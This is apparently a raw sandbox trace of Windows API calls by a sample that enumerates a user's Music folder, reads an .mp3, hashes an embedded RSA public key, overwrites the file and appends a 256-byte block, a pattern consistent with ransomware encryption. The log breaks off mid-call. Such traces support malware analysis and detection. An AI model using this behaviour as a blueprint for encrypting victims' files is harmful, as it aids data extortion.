FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mXrqWFqcp", cAlternateFileName="MXRQWF~1")) returned 1 [0194.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0194.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.644] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0fd0f0, ftCreationTime.dwHighDateTime=0x1d8986e, ftLastAccessTime.dwLowDateTime=0xa3c3f440, ftLastAccessTime.dwHighDateTime=0x1d8a48a, ftLastWriteTime.dwLowDateTime=0xa3c3f440, ftLastWriteTime.dwHighDateTime=0x1d8a48a, nFileSizeHigh=0x0, nFileSizeLow=0xb80c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nmf9EMIHkrld8q1qS.mp3", cAlternateFileName="NMF9EM~1.MP3")) returned 1 [0194.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1020 [0194.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1020 | out: hHeap=0x620000) returned 1 [0194.645] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\nmf9EMIHkrld8q1qS.mp3") returned=".mp3" [0194.645] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\nmf9EMIHkrld8q1qS.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\nmf9emihkrld8q1qs.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.646] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=47116) returned 1 [0194.646] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.649] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb7e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.649] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.651] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.651] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xb80c, lpOverlapped=0x0) returned 1 [0194.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.652] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.653] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.653] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.654] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.654] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.654] GetLastError () returned 0x0 [0194.654] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.654] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.654] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.654] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.654] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb810) returned 0x2ea79b0 [0194.655] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1020 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1068 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.656] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b70 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.659] GetCurrentThreadId () returned 0x66c [0194.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0070 [0194.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.660] GetCurrentThreadId () returned 0x66c [0194.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0194.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1068 | out: hHeap=0x620000) returned 1 [0194.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.672] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xb807, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xb807, lpOverlapped=0x0) returned 1 [0194.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.673] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb80c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.674] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", 